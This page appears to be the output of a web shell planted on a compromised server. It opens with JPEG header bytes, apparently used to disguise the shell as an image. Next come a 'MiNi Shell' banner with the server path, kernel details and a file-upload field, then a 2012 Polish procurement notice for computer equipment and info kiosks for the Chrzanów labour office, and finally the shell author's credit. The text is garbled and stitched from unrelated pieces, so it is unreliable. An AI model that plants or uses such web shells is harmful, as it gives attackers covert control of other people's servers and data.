JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120824/314202-N-2012.html

<p class="kh_header"><b>Chrzanów: Przedmiotem zamówienia jest dostawa sprzętu komputerowego wraz z akcesoriami komputerowymi dla Powiatowego Urzędu Pracy w Chrzanowie</b><br>
<b>Numer ogłoszenia: 314202 - 2012; data zamieszczenia: 24.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chrzanowie , ul. Słowackiego 8, 32-500 Chrzanów, woj. małopolskie, tel. 032 7533800, faks 032 7533899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa sprzętu komputerowego wraz z akcesoriami komputerowymi dla Powiatowego Urzędu Pracy w Chrzanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu komputerowego wraz z akcesoriami komputerowymi - 10 zestawów komputerowych wraz z oprogramowaniem , 1 szt. tablet, 1 szt. serwer plików wraz z  4 dyskami twardymi, 1 szt. router, 1 szt. UTM,  1 szt. tester płyt głównych , 1 szt. tester zasilaczy komputerowych, 5 szt. zestawów czyszczących, , 3 szt. pasta termoprzewodząca , 4 szt. zestawów pamięci SDHC 16GB wraz z czytnikiem USB , 5 szt. zasilaczy komputerowych 400W, 16 szt. akumulatorów AA 2700 mAh , 16 szt. akumulatorów AAA 1000 mAh , 2 szt. ładowarki do akumulatorów 4 x AAA/AA, 3 szt. bezprzewodowego wskaźnika laserowego, 15 szt. sprężonego powietrza 600ml, 15 szt. listwy zasilające , 2 szt. switch, 5 szt. zestawów klawiatura wraz z myszą bezprzewodową , 5 szt. klawiatury PS2 , 5 szt. klawiatury USB, 10 szt. myszy USB, 100 m kabla sieciowego UTP, 100 szt. wtyku sieciowego RJ - 45, 20 szt. wtyku sieciowego RJ-11, 10 szt. gniazdo teleinformatyczne, 3 szt. pokrowiec na tablet, 2 szt infokiosków ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.40.00-2, 30.23.31.32-5, 48.77.10.00-3, 30.23.41.00-9, 30.21.40.00-2, 30.23.13.00-0, 30.21.32.00-7, 32.42.00.00-3, 30.23.72.00-1, 30.23.72.50-6, 32.41.31.00-2, 30.23.11.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla I części zamówienia warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w ciągu ostatnich  3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje co najmniej 3 dostawy sprzętu komputerowego o wartości 50 000 zł każda. Wykonawca zobowiązany jest do przedstawienia referencji potwierdzających należyte wykonanie zamówienia.  ( załącznik nr 5a do SIWZ) 
- dla II części zamówienia warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w ciągu ostatnich  3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje co najmniej 3 dostawy infokiosków  o wartości 30 000 zł każda. Wykonawca zobowiązany jest do przedstawienia referencji potwierdzających należyte wykonanie zamówienia.       ( załącznik nr 5b do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy , ul. Słowackiego 8 , 32-500 Chrzanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2012 godzina 09:30, miejsce: Powiatowy Urząd Pracy , ul. Słowackiego 8 , 32-500 Chrzanów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu komputerowego wraz z akcesoriami komputerowymi dla Powiatowego Urzędu Pracy w Chrzanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu komputerowego wraz z akcesoriami komputerowymi - 10 zestawów komputerowych wraz z oprogramowaniem , 1 szt. tablet, 1 szt. serwer plików wraz z  4 dyskami twardymi, 1 szt. router, 1 szt. UTM,  1 szt. tester płyt głównych , 1 szt. tester zasilaczy komputerowych, 5 szt. zestawów czyszczących, , 3 szt. pasta termoprzewodząca , 4 szt. zestawów pamięci SDHC 16GB wraz z czytnikiem USB , 5 szt. zasilaczy komputerowych 400W, 16 szt. akumulatorów AA 2700 mAh , 16 szt. akumulatorów AAA 1000 mAh , 2 szt. ładowarki do akumulatorów 4 x AAA/AA, 3 szt. bezprzewodowego wskaźnika laserowego, 15 szt. sprężonego powietrza 600ml, 15 szt. listwy zasilające , 2 szt. switch, 5 szt. zestawów klawiatura wraz z myszą bezprzewodową , 5 szt. klawiatury PS2 , 5 szt. klawiatury USB, 10 szt. myszy USB, 100 m kabla sieciowego UTP, 100 szt. wtyku sieciowego RJ - 45, 20 szt. wtyku sieciowego RJ-11, 10 szt. gniazdo teleinformatyczne, 3 szt. pokrowiec na tablet,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.40.00-2, 30.23.31.32-5, 48.77.10.00-3, 30.21.40.00-2, 30.23.13.00-0, 30.21.32.00-7, 32.42.00.00-3, 30.23.72.00-1, 30.23.72.50-6, 32.41.31.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa infokiosków dla Powiatowego Urzędu Pracy w Chrzanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Infokiosk wewnętrzny stojący - 2 sztuki 
1.	Sugerowane wymiary urządzenia	Wysokość: 1350mm
Szerokość: 500mm
Głębokość: 600mm
2.	Obudowa materiał i kolory	Obudowa kiosku wykonana będzie w technice szkieletu aluminiowego malowanego proszkowo. Elementy poszycia wykonane z warstwowych płyt aluminiowo-kompozytowych. Obudowa monitora wykonana w formie odlewu kompozytowego.
Kształt infokiosku musi być przystosowany dla osób niepełnosprawnych (na wózku inwalidzkim) oraz musi zapewniać komfortowe korzystanie również przez osoby pełnosprawne. 
Kolorystyka obudowy infokiosku ustalona zostanie z zamawiającym.
3.	Logo	Na obudowie umieszczone zostanie podświetlane logo zamawiającego. Wymiary zostaną ustalone z zamawiającym.
4.	Jednostka sterująca	Processor : minimum 2.40GHz, z 2MB cache
Pamięć : minimum 4GB w jednym module 1333MHz DDR3 bez ECC
Dysk twardy : minimum 250GB 3,5-calowy Serial ATA (7,2 tys. obr. min)
System : zainstalowany system operacyjny (wraz z licencją i nośnikiem instalacyjnym) Windows 7 Professional (32-bit lub 64 bit) lub równoważny.
Karta graficzna i dźwiękowa : zintegrowana z płytą główną.
Karta sieciowa: 10 100 1000 Mb s
Napęd: DVD 
Zainstalowane oprogramowanie zarządzające kioskiem (wraz z licencją i nośnikiem instalacyjnym). 
5.	Monitor	Monitor 19 z nakładka dotykową w technologii pojemnościowej.
Przekątna: 19
	Plamka: 0,294 mm
	Maksymalna rozdzielczość: 1280 x 1024 pikseli
	Czas reakcji: 8 ms
	Jasność: 300 cd  m2
	Kontrast: 800:1
	Kąt widzenia: 160 stopni w pionie, 160 stopni w poziomie
	Złącza: analogowe D-Sub
	Gwarancja: 36 miesięcy
	Zintegrowana nakładka dotykowa  - ponad 60 milionów dotknięć
	Metoda wykrywania dotyku - IR
	Sposób wykrywania dotyku - palec lub wskaźnik
	Siła wykrycia dotyku - nie jest wymagana siła
	Precyzja pozycjonowania - 2mm
	Czas reakcji: 16ms
	Prędkość kursora - 120 pkt s
	Grubość szkła 3mm lub więcej
	Przejrzystość - nie mniej niż 92%
Monitor musi być ustawiony na odpowiedniej wysokości oraz pod odpowiednim kątem  który pozwoli na komfortowe korzystanie przez osoby niepełnosprawne (na wózku inwalidzkim) oraz przez osoby pełnosprawne. 
6.	Gwarancja	1.	5 lat na jednostkę centralną.
2.	Minimum 36 miesięcy na monitor z nakładką dotykową.
3.	Wsparcie techniczne na oprogramowanie i na serwis minimum 12 miesięcy.
4.	Usunięcie usterek w działaniu sprzętu i oprogramowania do 24 godzin od daty zgłoszenia. 
7.	Oprogramowanie	Oprogramowanie infokiosku musi umożliwiać ustawianie parametrów pracy przeglądarki, filtrów, wygaszacza ekranu, wirtualnej klawiatury, poczty elektronicznej, odtwarzania dźwięków, sposobu monitorowania pracy programu, restartów, ustawienie godziny startu i zamknięcia systemu, parametrów logowania akcji programu i generowania statystyk.
Przede wszystkim musi posiadać:
	 moduł filtrowania dostępnych i zabronionych zasobów internetowych,
	możliwość zdefiniowania strony startowej i określenia czasu powrotu do strony startowej,
	możliwość przeglądania stron internetowych zarówno w trybie on-line jak i off-line,
	wygląd przeglądarki i wszystkich elementów w niej zawartych (klawisze funkcyjne, tło itp.), jest definiowalny i będzie dostosowany do potrzeb zamawiającego,
	 zintegrowany  moduł e-mail, umożliwiający wysyłanie e-maili z poziomu programu
	przeglądarka  musi pozwalać na prace w dwóch trybach:
o	jednookienkowym - nowe okna są blokowane lub wyświetlane w tym samym oknie,
o	wielookienkowym - możliwość otwierania wielu okien jednocześnie, wybór aktywnego okna za pomocą zakładek,
	z przeglądarką zintegrowana jest wirtualna klawiatura umożliwiająca wygodne wprowadzanie informacji bezpośrednio na ekranie,
	funkcja powiększania przeglądanych stron WWW pozwalająca na wykorzystanie zalet ekranu dotykowego również na stronach internetowych z małymi czcionkami, odnośnikami i przyciskami bez konieczności przebudowy strony.
	Musi być przystosowana do korzystania przez osoby niepełnosprawne (niedowidzące i niedosłyszące)
8. 	Inne		Infokioski zamontowane zostaną w miejscu wskazanym przez zamawiającego.
	Przeprowadzenie szkolenia dla 2 osób z zakresu obsługi i konfiguracji urządzenia  w siedzibie zamawiającego.
Dostarczony sprzęt musi być fabrycznie nowy, musi pochodzić z oficjalnego kanału sprzedaży producenta na rynek polski. 
W ofercie podać producenta, typ i model..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com